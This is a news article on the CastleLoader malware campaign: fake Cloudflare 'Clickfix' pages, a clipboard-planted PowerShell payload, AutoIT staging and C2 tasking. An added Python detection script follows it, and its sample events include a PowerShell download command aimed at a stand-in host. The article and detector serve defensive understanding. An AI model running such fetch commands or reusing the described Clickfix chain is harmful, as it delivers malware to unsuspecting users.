CastleLoader, a rapidly evolving loader discovered in 2025, has surged across underground networks by weaponizing Cloudflare-themed “Clickfix” phishing pages and doctored GitHub repositories to compromise Windows hosts. The malware masquerades as benign developer resources, browser updates, or meeting portals, luring unsuspecting users into copying a seemingly innocent PowerShell command that promises to “verify” or “repair” site access. Once executed, that single line silently pulls CastleLoader onto the machine, opening the door to information-stealers such as StealC and RedLine as well as remote-access trojans like NetSupport RAT and SectopRAT.

Catalyst analysts identified at least seven distinct command-and-control (C2) servers coordinating these campaigns, several of which targeted government networks in the United States. The scope of the threat is significant: between May and July 2025 researchers recorded 1,634 malware-download attempts and 469 confirmed infections, an alarming 28.7% success rate among users who clicked the malicious links. In every observed wave, CastleLoader served as the common delivery hub, dynamically selecting secondary payloads according to each victim’s profile.

When a victim loads the fake Cloudflare verification page, embedded JavaScript silently issues /s.php?an=0 to retrieve a Base64-encoded PowerShell payload and copies it to the clipboard via unsecuredCopyToClipboard(). This script fetches a campaign-specific ZIP, unpacks an AutoIT loader, and executes shellcode that resolves hashed API names before contacting the C2 over HTTPS to fetch a final payload. By staging downloads through legitimate-looking domains and legitimate tooling (AutoIT), CastleLoader sidesteps many content filters while leaving minimal disk artefacts.

Catalyst researchers noted that the platform’s web-based C2 panel mirrors a malware-as-a-service dashboard, complete with statistics, geographic filters, and one-click redeployment to already compromised systems. Operators upload new binaries to a “Delivery” module and then craft tasks that embed PowerShell inlined into URL parameters, allowing campaign changes without touching the host sites. Further persistence is optional but potent: the C2 can instruct hijacked hosts to create scheduled tasks, inject DLLs into trusted processes, or repeatedly rerun payloads whenever a user logs on.

Because tasks are loaded from the server in real time, defenders cannot rely on static indicators; instead, behavioral detection that flags clipboard manipulation followed by outbound PowerShell traffic offers the best chance of early disruption.
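The behavioral rule suggested above (clipboard manipulation followed by a PowerShell launch and outbound traffic) can be expressed as a simple event correlator. The following is an added illustration, not code from the article or from Catalyst; the event schema, the two-minute window, the browser process names and the sample telemetry are all constructed assumptions.

```python
import base64
import re
from datetime import datetime, timedelta

# Constructed sample telemetry (not real CastleLoader logs). ws01 shows the
# Clickfix chain: browser clipboard write -> powershell -> outbound HTTPS.
# ws02 is an ordinary admin session that must not be flagged.
ENC = base64.b64encode("iwr https://example.invalid/s.php?an=0".encode("utf-16le")).decode()
SAMPLE_EVENTS = [
    {"ts": "2025-07-01T10:00:00", "host": "ws01", "type": "clipboard_write", "proc": "chrome.exe"},
    {"ts": "2025-07-01T10:00:40", "host": "ws01", "type": "process_start",
     "proc": "powershell.exe", "cmdline": "powershell -enc " + ENC},
    {"ts": "2025-07-01T10:00:42", "host": "ws01", "type": "network_connect",
     "proc": "powershell.exe", "dst": "203.0.113.10:443"},
    {"ts": "2025-07-01T11:00:00", "host": "ws02", "type": "process_start",
     "proc": "powershell.exe", "cmdline": "powershell Get-Service"},
    {"ts": "2025-07-01T11:00:05", "host": "ws02", "type": "network_connect",
     "proc": "powershell.exe", "dst": "10.0.0.5:5985"},
]

WINDOW = timedelta(seconds=120)          # assumed correlation window
BROWSERS = ("chrome", "msedge", "firefox")
ENC_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)

def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand text (Base64 of UTF-16LE) or None."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None

def detect_clickfix_chain(events, window=WINDOW):
    """Flag hosts where a browser clipboard write is followed within `window`
    by a PowerShell start that then opens an outbound connection."""
    ts = lambda e: datetime.fromisoformat(e["ts"])
    alerts, by_host = [], {}
    for ev in sorted(events, key=ts):
        by_host.setdefault(ev["host"], []).append(ev)
    for host, evs in by_host.items():
        for i, clip in enumerate(evs):
            if clip["type"] != "clipboard_write" or not clip["proc"].lower().startswith(BROWSERS):
                continue
            for p in evs[i + 1:]:
                if p["type"] != "process_start" or p["proc"].lower() != "powershell.exe":
                    continue
                if ts(p) - ts(clip) > window:
                    break
                net = [n for n in evs if n["type"] == "network_connect" and n["proc"].lower() == "powershell.exe"
                       and ts(p) <= ts(n) <= ts(p) + window]
                if net:
                    alerts.append({"host": host, "cmdline": p["cmdline"],
                                   "decoded": decode_encoded_command(p["cmdline"]), "dst": net[0]["dst"]})
    return alerts
```

Run against real EDR or Sysmon exports, the same three event types (clipboard write, process creation, network connection) are what the rule needs; decoding the encoded command lets analysts triage which alerts actually reach a download URL.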
This Cyber News was published on cybersecuritynews.com. Publication date: Fri, 25 Jul 2025 07:40:16 +0000